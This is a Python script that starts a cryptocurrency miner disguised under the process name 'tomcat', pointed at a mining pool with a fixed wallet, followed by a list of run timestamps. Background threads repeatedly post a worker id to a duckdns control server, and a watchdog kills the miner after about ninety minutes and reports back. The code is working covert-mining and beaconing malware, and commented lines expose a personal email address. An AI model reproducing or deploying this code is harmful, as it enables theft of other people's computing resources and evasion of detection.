import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:13:06.761002
#2018-02-17 17:02:07.509464
#2018-02-17 18:51:06.549427
#2018-02-17 20:40:01.351356
#2018-02-17 22:27:06.417353
#2018-02-18 00:09:07.241610
#2018-02-18 02:01:05.120223
#2018-02-18 03:48:03.723925
#2018-02-18 05:36:05.457424
#2018-02-18 07:28:07.244750
#2018-02-18 09:16:06.584206
#2018-02-18 11:02:01.575501
#2018-02-18 12:48:01.588921
#2018-02-18 14:36:01.659635
#2018-02-18 16:26:05.383467
#2018-02-18 18:14:05.236174
#2018-02-18 20:00:06.365756
#2018-02-18 21:46:05.271455
#2018-02-18 23:36:07.338102
#2018-02-19 01:22:05.893589
#2018-02-19 03:10:09.056259
#2018-02-19 04:55:03.983117
#2018-02-19 06:40:05.473872
#2018-02-19 08:30:04.362984
#2018-02-19 10:19:04.136267
#2018-02-19 12:07:05.868864
#2018-02-19 13:53:07.814733
#2018-02-19 15:43:02.120339
#2018-02-19 17:29:09.212173
#2018-02-19 19:17:08.541554
#2018-02-19 21:05:07.321031
#2018-02-19 22:51:01.476640
#2018-02-20 00:34:07.293831
#2018-02-20 02:22:04.946213
#2018-02-20 04:13:01.538688
#2018-02-20 05:56:07.157520
#2018-02-20 07:42:04.414315
#2018-02-20 09:26:02.243057
#2018-02-20 11:10:08.450714
#2018-02-20 12:58:08.948423
#2018-02-20 14:44:10.154019
#2018-02-20 16:29:06.896051
#2018-02-20 18:14:09.724043
#2018-02-20 20:06:07.696315
#2018-02-20 21:53:08.028700
#2018-02-20 23:35:07.242235
#2018-02-21 01:19:03.837163
#2018-02-21 03:06:04.648900
#2018-02-21 04:53:06.151963
#2018-02-21 06:41:05.108952
#2018-02-21 08:28:01.332674
#2018-02-21 10:14:02.130359
#2018-02-21 12:02:07.471430
#2018-02-21 13:50:01.454863
#2018-02-21 15:36:07.611780
#2018-02-21 17:26:09.198806
#2018-02-21 19:15:04.094137
#2018-02-21 21:03:07.038574
#2018-02-21 22:49:07.377591
#2018-02-22 00:40:09.141643
#2018-02-22 02:31:06.166286
#2018-02-22 04:17:07.466304
#2018-02-22 06:04:01.540224
#2018-02-22 07:49:06.502057
#2018-02-22 09:37:06.876491
#2018-02-22 11:23:04.629597
#2018-02-22 13:09:04.617926
#2018-02-22 14:57:07.469899
#2018-02-22 16:42:01.599843
#2018-02-22 18:28:01.723154
#2018-02-22 20:21:03.694296
#2018-02-22 22:06:05.554212
#2018-02-22 23:52:04.153604
#2018-02-23 01:41:09.495866
#2018-02-23 03:29:07.215701
#2018-02-23 05:15:09.255440
#2018-02-23 07:02:02.026160
#2018-02-23 08:50:07.384032
#2018-02-23 11:10:04.608743
#2018-02-23 13:03:01.721688
#2018-02-23 14:49:03.574264
#2018-02-23 16:38:08.025965
#2018-02-23 18:25:08.938727
#2018-02-23 20:09:05.409077
#2018-02-23 21:58:01.463309
#2018-02-23 23:45:04.116324
#2018-02-24 01:37:04.162214
#2018-02-24 03:26:03.761836
#2018-02-24 05:11:06.914213
#2018-02-24 06:59:01.385031
#2018-02-24 08:49:06.722566
#2018-02-24 10:55:07.773950
#2018-02-24 12:43:05.948039
#2018-02-24 14:32:06.031778
#2018-02-24 16:19:07.103991
#2018-02-24 18:13:07.111703
#2018-02-24 19:59:07.139497
#2018-02-24 21:43:06.638851
#2018-02-25 00:38:06.287411
#2018-02-25 04:03:04.944615
#2018-02-25 07:35:06.263999